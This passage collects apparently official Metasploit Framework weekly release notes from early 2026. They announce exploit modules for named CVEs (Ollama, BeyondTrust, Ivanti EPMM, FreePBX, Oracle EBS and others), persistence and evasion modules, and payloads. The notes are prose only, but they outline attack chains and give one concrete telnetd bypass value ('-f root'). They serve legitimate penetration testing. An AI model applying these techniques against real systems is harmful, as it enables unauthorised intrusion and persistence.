#20940 from g0tmi1k - Fixes an issue where the > (file Redirect operator) causes the exploit to fail. This updates the exploit to use tee to avoid that problematic operator and also increases debug verbosity, simplifies code, adds documentation, and adds support for fetch payloads to gain Linux Meterpreter sessions.
#20946 from g0tmi1k - Corrects issue where the revision value provided in the http requests can be outside the subset of revision id/value/numbers; a revision value that is not an actual revision value may result in a failed exploit. Also, cleaned up logic and increased debugging verbosity.
#21044 from adfoster-r7 - Fixes a crash when using db_import on a nessus with protocols other than tcp or udp.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 02/27/2026

Jacquie Harris — Fri, 27 Feb 2026 20:25:50 GMT

No Prob-ollama

This release brings some serious firepower with multiple new exploit modules and critical vulnerability support! The standout additions are the Ollama path traversal RCE (CVE-2024-37032), a sophisticated exploit chaining arbitrary file writes into unauthenticated root RCE, and the Grandstream GXP1600 stack overflow (CVE-2026-2329), which targets VoIP devices with accompanying credential harvesting and SIP interception post-modules.

The BeyondTrust PRA/RS module got upgraded with support for the new CVE-2026-1731 command injection vulnerability along with legacy CVE support. On the evasion front, there's fresh ARM64 RC4 encryption support with sleep-based detection bypass. Classic vulnerability modules like Unreal IRCd and vsftpd backdoors got quality-of-life improvements with proper check methods and multiple exploitation targets. Several auxiliary scanners (LDAP ESC, GraphQL introspection) also received critical bugfix updates eliminating false positives and crashes.

New module content (7)

Linux RC4 Packer with In-Memory Execution

Author: Massimo Bertocchi

Type: Evasion

Pull request: #20964 contributed by litemars

Path: linux/aarch64/rc4_packer

Description: First Linux evasion module for arm64, a packer using rc4 encryption, in memory execution of the elf binary, and sleep evasion.

BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution

Authors: Harsh Jaiswal and Jonah Burgess (CryptoCat)

Type: Exploit

Pull request: #20978 contributed by jburgess-r7

Path: linux/http/beyondtrust_pra_rs_command_injection

AttackerKB reference: CVE-2026-1731

Description: This adds a new module for unauthenticated command injection in BeyondTrust PRA/RS (CVE-2026-1731). This change also introduces a new library for BeyondTrust familiar helper functions; existing modules have been ported to use it.

GrandStream GXP1600 Unauthenticated Remote Code Execution

Author: sfewer-r7

Type: Exploit

Pull request: #20983 contributed by sfewer-r7

Path: linux/http/grandstream_gxp1600_unauth_rce

AttackerKB reference: CVE-2026-2329

Description: Adds three new modules: one exploit and two post modules, all targeting the Grandstream GXP1600 series of VoIP devices. The exploit module uses CVE-2026-2329 to gain a root session, and the post modules leverage that access to perform credential stealing and packet capture.

Ollama Model Registry Path Traversal RCE

Authors: Sagi Tzadik sagitz@wiz.io and Valentin Lobstein chocapikk@leakix.net

Type: Exploit

Pull request: #21006 contributed by Chocapikk

Path: linux/http/ollama_rce_cve_2024_37032

AttackerKB reference: CVE-2024-37032

Description: This adds a new exploit module for Ollama (CVE-2024-37032). Ollama's pull mechanism accepts arbitrary path traversal sequences, allowing an attacker to load a rogue OCI registry and write arbitrary files. The exploit does this by writing .so files into the target, then forcing Ollama to spawn a new process where the malicious library is loaded.

Linux WSL via Startup Folder Persistence

Author: h00die

Type: Exploit

Pull request: #20819 contributed by h00die

Path: linux/persistence/wsl/startup_folder

Description: This adds a new persistence module for WSL that writes a payload to the user's startup folder. The module creates a persistence for Windows; however, the initial access needs to be in Linux.

Windows Registry Active Setup Persistence

Author: h00die

Type: Exploit

Pull request: #20841 contributed by h00die

Path: windows/persistence/registry_active_setup

Description: This adds new persistence for Windows, which uses the Windows feature Active Setup. The module abuse is used to launch our payload, with 2 caveats. 1) You downgrade from admin to user permissions, 2) it only launches the payload once per user.

GrandStream GXP1600 proxy SIP traffic

Author: sfewer-r7

Type: Post

Pull request: #20983 contributed by sfewer-r7

Path: linux/capture/grandstream_gxp1600_sip

Enhancements and features (9)

#20859 from dledda-r7 - Splits the exe.rb into separate, more consistent files. Each file responds to a combination of platform and architecture, offering a better granular approach.
#20938 from Chocapikk - Improves the check method in the beyondtrust_pra_rs_unauth_rrce to properly detect older versions that are also vulnerable but report the version in a different way.
#20950 from g0tmi1k - Updates the vsftp_234_backdoor module to add shell and Meterpreter payloads, improves vulnerability detection, and improves the output for better troubleshooting.
#20951 from g0tmi1k - Moves default payload into DefaultOptions in Remote for Mac module. This makes it more consistent with other existing modules.
#20952 from g0tmi1k - Enhances the unix/irc/unreal_ircd_3281_backdoor module to increase payload options, including adding a native Meterpreter session, adds debugging logic inside the module, and more verbose output.
#20988 from adfoster-r7 - Improved SolarWinds exploit module to automatically pick the correct SRVHOST value.
#20992 from adfoster-r7 - Adds a check method to the ms17-010 scanner module to improve the metadata associated with automation workflows.
#21010 from Nayeraneru - This adds reporting for GitLab services.
#21014 from adfoster-r7 - Fixes a crash when running the ldap esc vulnerable cert finder against a target when LDAP binding fails.

Bugs fixed (1)

#21012 from adfoster-r7 - Improves the GraphQL Introspection Scanner module to correctly handle invalid responses and false positives.

Documentation added (3)

#20832 from DataExplorerX - Adds comprehensive documentation for the linux/samba/chain_reply module targeting CVE-2010-2063.
#20990 from jheysel-r7 - This adds and an AI Usage Policy to GSoC Ideas Page as requested by GSoC.
#21005 from h00die - This adds example of GNU inetutils auth bypass module against a Synology NAS to existing documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 02/20/2026

Diego Ledda — Fri, 20 Feb 2026 22:00:06 GMT

Hacking Churches and Backdooring Emacs

This release packs some solid exploit module additions! Two new unauthenticated RCE modules are a major win: the StoryChief WordPress plugin exploit (CVE-2025-7441) targets a webhook validation flaw allowing arbitrary file uploads, while the ChurchCRM exploit (CVE-2025-62521) abuses the installation wizard to inject PHP code for persistent access. Both establish Meterpreter sessions. On the persistence front, there's a creative Emacs extension module that plants malicious Lisp code for shell callbacks whenever Emacs launches; a fun take on an unconventional attack surface. Along with Emacs, a new Windows persistence using the old, gold registry; this time the UserInit one, to get Administrator shells when any user logs in. To wrap-up, now you can spread automation nightmares with the new n8n auxiliary module, allowing you to extract sessions of other logged users (even admins).

New module content (5)

n8n arbitrary file read

Authors: dor attias and msutovsky-r7

Type: Auxiliary

Pull request: #20856 contributed by msutovsky-r7

Path: gather/ni8mare_cve_2026_21858

Description: This adds an exploit module for n8n. The vulnerability, known as Ni8mare, allows arbitrary file read and session extraction of other users allowing privilege escalation on the WebApp context.

Emacs Extension Persistence

Author: h00die

Type: Exploit

Pull request: #20919 contributed by h00die

Path: linux/persistence/emacs_extension

Description: This adds a persistence module compatible with emacs for Linux, the emacs extension will trigger a session creation as the compromised user.

ChurchCRM Unauthenticated RCE 6.8.0

Author: LucasCsmt

Type: Exploit

Pull request: #20947 contributed by LucasCsmt

Path: multi/http/churchcrm_install_unauth_rce

AttackerKB reference: CVE-2025-62521

Description: This PR adds a new exploit module for CVE-2025-62521, targeting an unauthenticated Remote Code Execution (RCE) vulnerability in ChurchCRM versions 6.8.0 and earlier.

WordPress StoryChief Plugin Unauthenticated RCE

Authors: Nayera and xpl0dec

Type: Exploit

Pull request: #20976 contributed by Nayeraneru

Path: multi/http/wp_plugin_story_chef_file_upload

AttackerKB reference: CVE-2025-7441

Description: Adds a new exploit module targeting CVE-2025-7441, an unauthenticated RCE in the WordPress plugin StoryChief versions <= 1.0.45.

Windows Registry Persistence via Userinit

Authors: h00die and joel

Type: Exploit

Pull request: #20844 contributed by 6a6f656c

Path: windows/persistence/registry_userinit

Description: This adds a persistence module for Windows. Using the UserInit registry key the target machine will create a session with Admin privileges every time any user logs in.

Enhancements and features (2)

#20807 from webbsssss - Allow Acunetix vulnerabilities to be imported without complete web page data.
#20969 from sjanusz-r7 - Updates Metasploit's logic when importing Acunetix XML files to now also include items that are less than High severity.

Bugs fixed (1)

#20972 from adfoster-r7 - Fixes false positives on lg simple editor check methods.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 02/13/2026

Christopher Granleese — Fri, 13 Feb 2026 20:01:55 GMT

SolarWinds Web Help Desk

Our very own sfewer-r7 has developed an exploit module for the SolarWinds Web Help Desk vulnerabilities CVE-2025-40536 and CVE-2025-40551. On successful exploitation the session will be as running as NT AUTHORITY\SYSTEM. For more information see the Rapid7’s SolarWinds Web Help Desk Vulnerabilities guidance.

Contributions

A big thanks to our contributors who have been adding some great content this release. rudraditya21 has added MITRE ATT&CK metadata to lots of our existing modules. Chocapikk has added support for GHSA (GitHub Security Advisory) references support in Metasploit modules. rudraditya21 also added a change which adds negative caching to the LDAP entry cache, which will now mean missing objects are recorded. It also introduces a missing-entry sentinel, tracks misses per identifier type, and updates AD lookup helpers to short‑circuit on cached misses and record misses when a lookup returns no entry.

New module content (5)

FreeBSD rtsold/rtsol DNSSL Command Injection

Authors: Kevin Day and Lukas Johannes Möller

Type: Exploit

Pull request: #20798 contributed by JohannesLks

Path: freebsd/misc/rtsold_dnssl_cmdinject

AttackerKB reference: CVE-2025-14558

Description: This adds a new command-injection exploit in the FreeBDS rtsol/rtsold daemons (CVE-2025-14558). The vulnerability can be triggered by the Domain Name Search List (DNSSL) option in IPv6 Router Advertisement (RA) messages, which is passed to the resolvconf script without sanitization. It requires elevated privilege as it needs to send IPv6 packets. The injected commands are executed as root.

Ivanti Endpoint Manager Mobile (EPMM) unauthenticated RCE

Authors: sfewer-r7 and watchTowr

Type: Exploit

Pull request: #20932 contributed by sfewer-r7

Path: linux/http/ivanti_epmm_rce

AttackerKB reference: CVE-2026-1340

Description: Adds an exploit module for the recent command injection vulnerability, CVE-2026-1281, affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron. Exploited in-the-wild as a zero-day by an unknown threat actor.

GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061

Authors: Kyu Neushwaistein and jheysel-r7

Type: Exploit

Pull request: #20929 contributed by jheysel-r7

Path: linux/telnet/gnu_inetutils_auth_bypass

AttackerKB reference: CVE-2026-24061

Description: This adds an exploit module for the authentication bypass in GNU Inetutils telnetd tracked as CVE-2026-24061. During negotiation, if the USER environment variable is passed in with a value of "-f root" authentication can be bypassed resulting in command execution as the root user.

SolarWinds Web Help Desk unauthenticated RCE

Authors: Jimi Sebree and sfewer-r7

Type: Exploit

Pull request: #20917 contributed by sfewer-r7

Path: multi/http/solarwinds_webhelpdesk_rce

AttackerKB reference: CVE-2025-40551

Description: This adds an exploit module for SolarWinds Web Help Desk vulnerable to CVE-2025-40536 and CVE-2025-40551. The exploit triggers session opening as NT AUTHORITY\SYSTEM and root.

Xerte Online Toolkits Arbitrary File Upload - Upload Image

Author: Brandon Lester

Type: Exploit

Pull request: #20849 contributed by haicenhacks

Path: multi/http/xerte_authenticated_rce_uploadimage

Description: This adds three RCE modules for Xerte Online Toolkits affecting versions 3.14.0 and <= 3.13.7. Two are unauthenticated while one is authenticated.

Enhancements and features (10)

#20710 from Chocapikk - Adds support for GHSA (GitHub Security Advisory) and OSV (Open Source Vulnerabilities) references in Metasploit modules.
#20886 from cdelafuente-r7 - Updates services to now also have child services. This allows for more detailed reporting for the services and vulns commands which can now report parent -> child services e.g. SSL -> HTTPS.
#20895 from rudraditya21 - Adds negative caching to the LDAP entry cache so missing objects are recorded and subsequent lookups by DN, sAMAccountName, or SID return nil without re-querying the directory.
#20934 from rudraditya21 - This adds MITRE ATT&CK tags to modules related to LDAP and AD CS. This enables users to find this content using Metasploit's search functionality and the att&ck keyword.
#20935 from rudraditya21 - Adds the MITRE ATT&CK tag T1558.003 to the kerberoast modules. This enables users to find this content using Metasploit's search functionality and the att&ck keyword.
#20936 from rudraditya21 - This adds MITRE ATT&CK tags to SMB modules related to accounts. This enables users to find the content by using Metasploit's search capability and the att&ck keyword.
#20937 from rudraditya21 - This adds MITRE ATT&CK tags to the two existing SCCM modules that fetch NAA credentials using different techniques. This enables users to find this content using Metasploit's search functionality and the att&ck keyword.
#20941 from rudraditya21 - Adds a MITRE ATT&CK technique reference to the Windows password cracking module to support ATT&CK‑driven discovery.
#20942 from rudraditya21 - Adds MITRE ATT&CK technique references to getsystem, cve_2020_1472_zerologon, and atlassian_confluence_rce_cve_2023_22527 modules to support ATT&CK‑driven discovery.
#20943 from g0tmi1k - Adds affected versions the description in the ‎exploits/unix/webapp/twiki_maketext module.

Bugs fixed (7)

#20599 from BenoitDePaoli - Fixes an issue where running services -p -u -R to set RHOSTS with values from the database could lead to a silently failing file not found error.
#20775 from rmtsixq - Fixes a database initialization failure when using msfdb init with the --connection-string option to connect to PostgreSQL 15+ instances (e.g., Docker containers).
#20817 from randomstr1ng - Adds a fix to ensure the output of sap_router_portscanner no longer causes module crashes.
#20903 from jheysel-r7 - Fixes an issue so #enum_user_directories no longer returns duplicate directories.
#20906 from rudraditya21 - Implements a fix for SSH command shells dying on cmd_exec when a trailing newline was present.
#20953 from zeroSteiner - Improves the stability of socket channeling support for SSH sessions opened via scanner/ssh/ssh_login.
#20955 from adfoster-r7 - Ensures the cleanup of temporarily created RHOST files when using the services -p -u -R command to set RHOST values from the database.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 02/06/2026

Christopher Granleese — Fri, 06 Feb 2026 18:52:32 GMT

Google Summer of Code 2026

Our very own Jack Heysel has added some documentation which outlines the Metasploit Framework project ideas for GSoC 2026. For anyone interested in applying please see GSoC-How-To-Apply documentation, or reach out on slack to any of the following GSoC mentors on Slack via the Metasploit Slack:

@jheysel
@zeroSteiner
@h00die

Gladinet

This week Chocapikk has added some Gladinet CentreStack/Triofox exploitation capabilities. Adding two auxiliary modules and updating an existing exploit. The updated exploit module now accepts a custom MACHINEKEY option to leverage newly discovered vulnerabilities that allow the extraction of machineKeys from Web.config files. The gladinet_storage_path_traversal_cve_2025_11371 module exploits path traversal to read arbitrary files and extract machineKeys, while gladinet_storage_access_ticket_forge forges access tickets using hardcoded cryptographic keys.

New module content (1)

Gladinet CentreStack/Triofox Access Ticket Forge

Authors: Huntress Team, Julien Voisin, and Valentin Lobstein chocapikk@leakix.net

Type: Auxiliary

Pull request: #20768 contributed by Chocapikk

Path: gather/gladinet_storage_access_ticket_forge

Description: This adds two auxiliary modules for Gladinet CentreStack/Triofox. Both modules can read arbitrary files and extract the machineKey, which is used to secure ASP.NET ViewState data. Furthermore, this change also includes a new mixin for Gladinet.

Enhancements and features (3)

#20739 from cdelafuente-r7 - This adds MITRE ATT&CK metadata tags to modules relating to Kerberos and unconstrained delegation. This enables users to search for the content based on the ATT&CK technique ID.
#20882 from karanabe - Adds the RSAKeySize advanced option and uses it when generating the CSR key pair, allowing users to increase key size to meet certificate template minimums and avoid CERTSRV_E_KEY_LENGTH errors when 2048-bit keys are rejected.
#20883 from jheysel-r7 - Updates Kerberos modules to present a user friendly message when the user specifies the IMPERSONATE option when running a module but also forgets to specify IMPERSONATION_TYPE.

Bugs fixed (5)

#20368 from isaac-app-dev - Fixes an issue that caused msfvenom to break if it were run from alternative directories.
#20680 from cdelafuente-r7 - Improves the RPC API with multiple fixes and enhancements.
#20834 from kuklycs - This fixes the NoMethodError in the team_viewer post module, caused by misuse of the each_key method. The keys array has been updated to a 1-D array to simplify the logic.
#20916 from Chepycou - Fixes a crash when running the SAP modules sap_soap_rfc_system_info or sap_icf_public_info.
#20920 from rudraditya21 - This fixes a bug in password cracking modules where the auto action would crash even when the path to a compatible executable was specified in CRACKER_PATH.

Documentation added (1)

#20910 from jheysel-r7 - This adds documentation regarding the projects for which we are soliciting submissions for as part of the Google Summer of Code program.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 01/30/2026

Spencer McIntyre — Fri, 30 Jan 2026 21:11:27 GMT

FreeBPX Content Galore

This week brings 3 new pieces of module content for targeting FreePBX. All three chain multiple vulnerabilities together, starting with CVE-2025-66039. This initial vulnerability allows unauthenticated users to bypass the authentication process to interact with FreePBX. From this point, the different modules leverage either a SQL injection vulnerability (CVE-2025-61675) or a file upload vulnerability (CVE-2025-61678) to obtain remote code execution.

New module content (7)

FreePBX endpoint SQLi to RCE

Authors: Noah King and msutovsky-r7 Type: Exploit Pull request: #20857 contributed by msutovsky-r7 Path: unix/http/freepbx_custom_extension_rce AttackerKB reference: CVE-2025-61675

Description: This adds exploit module for FreePBX which chains an authentication bypass, CVE-2025-66039, with a SQLi, CVE-2025-61675, which allows for a cron job to be added to the cron_job table of the database to allow for Remote Code Execution.

FreePBX firmware file upload

Authors: Noah King and msutovsky-r7 Type: Exploit Pull request: #20858 contributed by msutovsky-r7 Path: unix/http/freepbx_firmware_file_upload AttackerKB reference: CVE-2025-61678

Description: This adds exploit module for FreePBX which chains an authentication bypass, CVE-2025-66039, with an unrestricted file upload (via firmware upload), CVE-2025-61678, which allows for a webshell to be uploaded to the webserver resulting in remote code execution.

FreePBX Custom Extension SQL Injection

Authors: Noah King and msutovsky-r7 Type: Auxiliary Pull request: #20846 contributed by msutovsky-r7 Path: gather/freepbx_custom_extension_injection AttackerKB reference: CVE-2025-61675

Description: This adds an exploit module for FreePBX which chains an authentication bypass, (CVE-2025-66039) with an SQLi (CVE-2025-61675) to create an admin user in the database.

Cacti Graph Template authenticated RCE versions prior to 1.2.29

Authors: Jack Heysel and chutchut Type: Exploit Pull request: #20799 contributed by jheysel-r7 Path: multi/http/cacti_graph_template_rce AttackerKB reference: CVE-2025-24367

Description: This adds an exploit for CVE-2025-24367 which is an unauthenticated RCE in Cacti.

SmarterTools SmarterMail GUID File Upload Vulnerability

Authors: Piotr Bazydlo, Sina Kheirkhah, and jheysel-r7 Type: Exploit Pull request: #20866 contributed by jheysel-r7 Path: multi/http/smartermail_guid_file_upload AttackerKB reference: CVE-2025-52691

Description: This adds a module for unauthenticated file upload in SmarterTools SmaterMail (CVE-2025-52691). The vulnerability allows an unauthenticated user to upload a file to any location on the system using path traversal using the guid variable. The module will either drop a webshell in the webroot directory (if the target is Windows) or create a cron job by dropping a file in /etc/cron.d (if the target is Linux).

Burp Extension Persistence

Author: h00die Type: Exploit Pull request: #19821 contributed by h00die Path: multi/persistence/burp_extension

Description: This adds a new persistence module for BurpSuite. The module adds a malicious extension to both the Pro and Community versions, which is triggered when the user starts BurpSuite.

SSH Key Persistence

Authors: Dean Welch dean_welch@rapid7.com and h00die mike@shorebreaksecurity.com Type: Exploit Pull request: #20778 contributed by h00die Path: multi/persistence/ssh_key

Description: Combines the Windows and Linux ssh key persistence modules.

Enhancements and features (1)

#20778 from h00die - Combines the Windows and Linux ssh key persistence modules.

Bugs fixed (3)

#20897 from h00die - This fixes a bug that was preventing collected hash data from being formatted as input for the John the Ripper cracker. The result is that users can now once again crack passwords using John.
#20902 from rudraditya21 - This fixes a bug in the auxiliary/scanner/ssh/ssh_login module that would incorrectly state that a login failed when it in fact succeeded but the module was unable to open a session. This was only an issue when the CreateSession option is true.
#20909 from adfoster-r7 - Fixes a bug in Metasploit Pro that reported false positives for HTTP bruteforcing.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 01/23/2026

Jack Heysel — Fri, 23 Jan 2026 21:00:28 GMT

Oracle E-Business Suite Unauth RCE

This week, we are pleased to announce the addition of a module that exploits CVE-2025-61882, a pre-authentication remote code execution vulnerability in Oracle E-Business Suite versions 12.2.3 through 12.2.14. The exploit chains multiple flaws—including SSRF, path traversal, HTTP request smuggling, and XSLT injection—to coerce the target into fetching and executing a malicious XSL file hosted by the attacker. Successful exploitation results in arbitrary command execution and an interactive shell on both Linux/Unix and Windows targets. The module is reliable, repeatable, and we here at Metasploit hope you enjoy it, happy hacking!

New module content (3)

Authenticated RCE in Splunk (splunk_archiver app)

Authors: Alex Hordijk, Maksim Rogov, and psytester Type: Exploit Pull request: #20770 contributed by vognik Path: linux/http/splunk_auth_rce_cve_2024_36985 AttackerKB reference: CVE-2024-36985

Description: This adds two separate Metasploit exploit modules targeting Remote Code Execution (RCE) vulnerabilities in Splunk Enterprise. CVE-2024-36985 exploits unsafe use of the "copybuckets" lookup function within the splunk_archiver application, resulting in execution of the sudobash helper script with attacker-controlled arguments. Affected versions: All releases prior to 9.0.10, 9.1.2 through 9.1.5, 9.2.0 through 9.2.2 CVE-2022-43571, exploits a Python code injection vulnerability in Splunk SimpleXML dashboards by injecting malicious code into sparkline style parameters. Malicious code is executed when a user exports the dashboard to PDF. Affected versions: All releases prior to 8.1.12, 8.2.0 through 8.2.9, 9.0.0 through 9.0.2.

Oracle E-Business Suite CVE-2025-61882 RCE

Authors: Mathieu Dupas and watchTowr (Sonny, Sina Kheirkhah, Jake Knott) Type: Exploit Pull request: #20750 contributed by MatDupas Path: multi/http/oracle_ebs_cve_2025_61882_exploit_rce AttackerKB reference: CVE-2025-61882

Description: This adds an exploit for CVE-2025-61882, a critical Remote Code Execution (RCE) vulnerability in Oracle E-Business Suite (EBS). The flaw allows unauthenticated attackers to execute arbitrary code by leveraging a combination of SSRF, HTTP request smuggling and XSLT injection. Affected Versions: Oracle E-Business Suite, 12.2.3-12.2.14.

Authenticated RCE in Splunk (SimpleXML dashboard PDF generation)

Authors: Danylo Dmytriiev, Maksim Rogov, and psytester Type: Exploit Pull request: #20770 contributed by vognik Path: multi/http/splunk_auth_rce_cve_2022_43571 AttackerKB reference: CVE-2022-43571

Enhancements and features (3)

#20755 from rudraditya21 - This adds an advanced datastore option, KrbClockSkew, to modules that use Kerberos authentication, allowing operators to adjust the Kerberos clock from the Metasploit side to fix clock skew errors.
#20840 from xaitax - This updates the MongoBleed auxiliary module and adds new options. The module can now use Wiz Magic Packet to detect the vulnerability quickly; it can detect compression libraries used by MongoDB (and warns or stops the user if zlib is not enabled). The module can also reuse the MongoDB socket connection during memory scanning, which significantly improves performance. Finally, it can better leak secrets, either by pattern matching or by storing the extracted information in raw or JSON format.
#20861 from bcoles - Adds multiple improvements to get_hostname resolution logic for post exploitation modules.

Bugs fixed (1)

#20888 from jheysel-r7 - Fixes an issue that caused dMSA kerberos authentication to fail.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 01/16/2026

Simon Janusz — Fri, 16 Jan 2026 18:49:01 GMT

Persistence, dMSA Abuse & RCE Goodies

This week, we have received a lot of contributions from the community, such as h00die, Chocapikk and countless others, which is greatly appreciated. This week’s modules and improvements in Metasploit Framework range from new modules, such as dMSA Abuse (resulting in escalation of privilege in Windows Active Directory environments), authenticated and unauthenticated RCE modules, as well as many improvements and additions to the persistence modules and techniques.

New module content (13)

BadSuccessor: dMSA abuse to Escalate Privileges in Windows Active Directory

Authors: AngelBoy, Spencer McIntyre, and jheysel-r7

Type: Auxiliary

Pull request: #20472 contributed by jheysel-r7

Path: admin/ldap/bad_successor

Description: This adds an exploit for "BadSuccessor" which is a vulnerability whereby a user with permissions to an Organizational Unit (OU) in Active Directory can create a Delegated Managed Service Account (dMSA) account in such a way that it can lead to the issuance of a Kerberos ticket for an arbitrary user.

Control Web Panel /admin/index.php Unauthenticated RCE

Authors: Egidio Romano and Lukas Johannes Möller

Type: Exploit

Pull request: #20806 contributed by JohannesLks

Path: linux/http/control_web_panel_api_cmd_exec

AttackerKB reference: CVE-2025-67888

Description: This adds a new module for Control Web Panel (CVE-2025-67888). The vulnerability is unauthenticated OS command injection through an exposed API. The modules require Softaculous to be installed.

Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload

Author: Alexandru Ionut Raducu

Type: Exploit

Pull request: #20811 contributed by Xorriath

Path: linux/http/prison_management_rce

AttackerKB reference: CVE-2024-48594

Description: This adds a new module for Prison Management System 1.0 (CVE-2024-48594). The module requires admin credentials, which are subsequently used to exploit unrestricted file upload to upload a webshell.

udev Persistence

Author: Julien Voisin

Type: Exploit

Pull request: #20796 contributed by h00die

Path: linux/persistence/udev

Description: This moves the udev persistence module into the persistence category and adds the persistence mixin.

n8n Workflow Expression Remote Code Execution

Author: Lukas Johannes Möller

Type: Exploit

Pull request: #20810 contributed by JohannesLks

Path: multi/http/n8n_workflow_expression_rce

AttackerKB reference: CVE-2025-68613

Description: This adds a new module for n8n (CVE-2025-68613). The vulnerability is authenticated remote code execution in the workflow expression evaluation engine. The module requires credentials to create a malicious workflow that executes system commands via a JavaScript payload.

Web-Check Screenshot API Command Injection RCE

Author: Valentin Lobstein chocapikk@leakix.net

Type: Exploit

Pull request: #20791 contributed by Chocapikk

Path: multi/http/web_check_screenshot_rce

AttackerKB reference: CVE-2025-32778

Description: Adds an exploit module for CVE-2025-32778, a command injection vulnerability in Web-Check's screenshot API endpoint which allows unauthenticated remote code execution by injecting shell commands via URL query parameters in the /api/screenshot endpoint.

Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key

Authors: OJ Reeves and h00die

Type: Exploit

Pull request: #20751 contributed by h00die

Path: windows/persistence/accessibility_features_debugger

Description: This updates the Windows sticky keys post persistence module to use the new persistence mixin.

WMI Event Subscription Event Log Persistence

Authors: Nick Tyrer <@NickTyrer> and h00die

Type: Exploit

Pull request: #20706 contributed by h00die

Path: windows/persistence/wmi/wmi_event_subscription_event_log

Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.

WMI Event Subscription Interval Persistence

Authors: Nick Tyrer <@NickTyrer> and h00die

Type: Exploit

Pull request: #20706 contributed by h00die

Path: windows/persistence/wmi/wmi_event_subscription_interval

WMI Event Subscription Process Persistence

Authors: Nick Tyrer <@NickTyrer> and h00die

Type: Exploit

Pull request: #20706 contributed by h00die

Path: windows/persistence/wmi/wmi_event_subscription_process

WMI Event Subscription Logon Timer Persistence

Authors: Nick Tyrer <@NickTyrer> and h00die

Type: Exploit

Pull request: #20706 contributed by h00die

Path: windows/persistence/wmi/wmi_event_subscription_uptime

Linux Chmod

Author: bcoles bcoles@gmail.com

Type: Payload (Single)

Pull request: #20845 contributed by bcoles

Path: linux/armle/chmod and linux/aarch64/chmod

Description: Adds Linux ARM 32-bit / 64-bit Little Endian chmod payloads.

Enhancements and features (7)

#20706 from h00die - Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.
#20751 from h00die - This updates the Windows sticky keys post persistence module to use the new persistence mixin.
#20785 from Chocapikk - This adds Waku framework support to the existing react2shell module. Waku is a minimal React framework which differs slightly compared to Node.js. The module maintains backward compatibility with existing Next.js targets while adding Waku support through a modular framework configuration system.
#20786 from zeroSteiner - This updates the module code to merge the target Arch and Platform entries into the module's top level data. Prior to this change module developers had to define Arch and Platform entries twice, once at the module level and again per individual target. This updates over 500 modules and removes that duplication.
#20796 from h00die - This moves the udev persistence into the persistence category and adds the persistence mixin.
#20853 from zeroSteiner - Bumps metapsloit-payloads to 2.0.239.
#20855 from h00die - Adds additional ATT&CK references to persistence modules.

Bugs fixed (2)

#20738 from Shubham0699 - This fixes an issue in the bailiwicked DNS modules that was causing the module to fail with a stack trace due to a programming error.
#20847 from dwelch-r7 - This updates the auxiliary/scanner/ssh/ssh_login module to remove stale documentation, remove unnecessary characters that were printed in the output and update the correct documentation with the new information about key usage.

Documentation added (1)

#20665 from basicallyabidoof - Adds documentation for the ipv6_neighbor_router_advertisement module.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 01/09/2026

Spencer McIntyre — Fri, 09 Jan 2026 23:07:48 GMT

RISC-V Payloads

This week brings more RISC-V payloads from community member bcoles. One provides a new adapter which allows RISC-V payloads to be converted to commands and delivered as a Metasploit fetch-payload. The second is a classic bind shell, offering the user interactive connectivity to the target host. Both of these go a long way in improving Metasploit’s support for RISC-V systems.

Annual Wrap Up

With a new year comes a new annual wrap up. Earlier this week, the Metasploit project posted the annual wrap up covering notable changes from 2025.

New module content (4)

Taiga tribe_gig authenticated unserialize remote code execution

Authors: rootjog and whotwagner

Type: Exploit

Pull request: #20700 contributed by whotwagner

Path: multi/http/taiga_tribe_gig_unserial

AttackerKB reference: CVE-2025-62368

Description: This adds a new module for authenticated deserialization vulnerability in Taiga.io (CVE-2025-62368). The module sends malicious data to exposed API, which performs unsafe deserialization, leading to remote code execution.

Python Site-Specific Hook Persistence

Author: msutovsky-r7

Type: Exploit

Pull request: #20692 contributed by msutovsky-r7

Path: multi/persistence/python_site_specific_hook

Description: This adds a persistence module which leverages Python's startup mechanism, where some files can be automatically processed during the initialization of the Python interpreter. Someof those files are startup hooks (site-specific, dist-packages). If these files are present in site-specific or dist-packages directories, any lines beginning with import will be executed automatically. This creates a persistence mechanism if an attacker has established access to the target machine with sufficient permissions.

Add Linux RISC-V command payload adapters

Authors: bcoles bcoles@gmail.com

Type: Payload (Adapter)

Pull request: #20734 contributed by bcoles

Description: This extends fetch payloads for RISC-V targets.

Linux Command Shell, Bind TCP Inline

Authors: bcoles bcoles@gmail.com and modexp

Type: Payload (Single)

Pull request: #20733 contributed by bcoles

Path: linux/riscv32le/shell_bind_tcp

Description: This adds a new payload: a bind shell for Linux RISC-V targets.

Bugs fixed (2)

